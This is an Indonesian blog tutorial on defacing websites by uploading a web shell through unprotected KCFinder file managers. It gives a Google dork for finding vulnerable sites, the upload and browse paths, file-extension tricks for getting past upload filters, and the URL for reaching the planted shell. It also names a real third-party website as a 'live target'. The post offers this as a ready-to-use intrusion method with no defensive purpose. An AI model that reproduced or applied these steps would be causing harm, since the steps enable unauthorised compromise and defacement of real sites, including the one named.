Tutorial Deface Kcfinder Upload Shell (Basic) - Blog Indonesian Code Party
  • Tutorial

    • Tutorial Deface Kcfinder Upload Shell (Basic)

    Januari 29, 2019 Anwar saputra
    Tutorial Deface Kcfinder Upload Shell


    Oke gua hari ini mau share Tutorial Deface Kcfinder Upload Shell

    Mungkin buat Kalian ada yang Belom Tau Tutorial ini Caranya Cukup Simple Bagi pemula ;).

    Oke langsung saja

    Bahan :
    > Dork
    > Shell
    > Internet
    > Kopi


    DORK: inurl:/kcfinder/upload/ sisanya? Use Your Brain :)
    Exploit: www.target.com/[path]/kcfinder/upload.php or browse.php

    1. Langkah Pertama Cari dulu menggunakan Dork diatas Melalui Google Image, Nah Karna disini gua udah dapet Site nya jadi langsung aja Ok
    Ciri Ciri Target Vuln? pas buka upload.php ada notice "Unknown Error"


    2. Kalo udah muncul Gitu Langsung aja Buka www.target.com/kcfinder/browse.php


    3. kalo udah Keliatan Seperti itu Tinggal kalian Upload shell kalian :) Sebelum Upload shell kalian ubah extensi shell kalian terlebih dahulu agar bisa ke upload.
    Type extensi Shell: .php.fla, .php2, .php5, .php56, .php.pjpg


    4. Kalo udah ke upload tinggal Kalian Akses file kalian tadi
    Caranya: www.target.com/[PATH]/kcfinder/upload/files/shell.php

    LIVE TARGET: https://www.judoverenigingdeusone.nl/kcfinder/browse.php

    Sekian Terimakasih :'D
    You May Also Like

    Posting Komentar

    0 Komentar